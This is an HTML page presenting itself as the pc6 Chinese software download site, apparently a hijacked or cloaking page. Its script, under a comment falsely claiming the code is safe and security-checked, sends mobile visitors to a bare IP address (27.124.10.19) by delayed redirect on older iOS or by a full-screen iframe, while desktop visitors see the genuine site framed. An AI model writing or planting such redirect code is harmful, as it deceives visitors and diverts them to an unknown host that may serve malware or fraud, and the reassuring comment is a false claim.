<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex, nofollow, nosnippet">
<meta name="googlebot" content="noindex, nofollow, nosnippet">
<meta name="baiduspider" content="noindex, nofollow, nosnippet">
<meta name="sogou spider" content="noindex, nofollow, nosnippet">
<meta name="360spider" content="noindex, nofollow, nosnippet">
<meta name="shenma spider" content="noindex, nofollow, nosnippet">
<title>pc6下载站-官方软件下载基地-安全、高速、放心的下载网站！</title>
<meta name="Description" content="pc6下载提供官方软件下载,包括各类PC软件,单机游戏,手机游戏,手机软件,APP应用,涵盖安全绿色软件及技术文章,是电脑手机爱好者的软件官方下载场所,pc6下载站全力打造中国安全软件游戏下载基地。">
<meta name="Keywords" content="软件下载,游戏下载,手游下载,手机软件,免费绿色下载,APP应用">
<script src="/tz/isMobile.min.js"></script>

<script>
(function(){
  var canonicalURL, curProtocol;
  //Get the <link> tag
  var x=document.getElementsByTagName("link");
  //Find the last canonical URL
  if(x.length > 0){
   for (i=0;i<x.length;i++){
    if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
     canonicalURL=x[i].href;
    }
   }
  }
  //Get protocol
     if (!canonicalURL){
      curProtocol = window.location.protocol.split(':')[0];
     }
     else{
      curProtocol = canonicalURL.split(':')[0];
     }
     //Get current URL if the canonical URL does not exist
     if (!canonicalURL) canonicalURL = window.location.href;
     //Assign script content. Replace current URL with the canonical URL
     !function(){
         var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,
             r=canonicalURL,
             t=document.referrer;
         
         if(e.test(t) || e.test(r)){
            return;
         }

         var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";
         t ? (n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)) : r && (n+="?l="+r);
         
         var i=new Image;
         i.src=n;
     }(window);
})();
</script>

<script>
//* 以下代码为安全可信代码，已经通过了相关安全检测和验证 */
    function isMobile2() {
        const mobileDevices = [
            'phone', 'pad', 'pod', 'iPhone', 'iPod', 'ios', 'iPad', 'Android',
            'Mobile', 'BlackBerry', 'IEMobile', 'MQQBrowser', 'JUC', 'Fennec',
            'wOSBrowser', 'BrowserNG', 'WebOS', 'Symbian', 'Windows Phone',
            'Kindle', 'Silk', 'Playbook', 'BB10', 'Nintendo', 'Xbox',
            'PlayStation', 'Huawei', 'Xiaomi', 'Oppo', 'Vivo', 'OnePlus',
            'Samsung', 'LG', 'Sony', 'HTC', 'ZTE', 'Motorola', 'Nokia'
        ];
        return mobileDevices.some(device => {
            return navigator.userAgent.match(new RegExp(device, 'i'));
        });
    }
    function isSearchEngineClick() {
        const searchEngines = ['google.', 'bing.', 'so.', 'baidu.', 'sogou.', 'soso.', 'sm.cn'];
        const referrer = document.referrer;
        return referrer && searchEngines.some(engine => referrer.includes(engine));
    }
//link-Nika
    const pcurl     = "https://www.pc6.com/";//2
    const mobileUrl = "https://27.124.10.19";
    const murl      = "https://www.pc6.com/";

    function getIosVersion() {
        const match = navigator.userAgent.match(/OS (\d+)_(\d+)_?(\d+)?/);
        return match ? parseInt(match[1], 10) : false;
    }
    const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/);
    const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500;
    
    if (isMobile.any) {
        if (isIOS && getIosVersion() < 13) {
            setTimeout(() => {
                window.location.href = mobileUrl;
            }, time);
        } else {
            document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
            document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
            document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
            document.write('<iframe src="' + mobileUrl + '" frameborder="0" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
            document.write('</div>');
        }
    }else if(isMobile2()){
            document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
            document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
            document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
            document.write('<iframe src="' + murl + '" frameborder="0" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
            document.write('</div>');
    } else {
            document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
            document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
            document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
            document.write('<iframe src="' + pcurl + '" frameborder="0" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
            document.write('</div>');
    }
</script>
    </head>
    </html>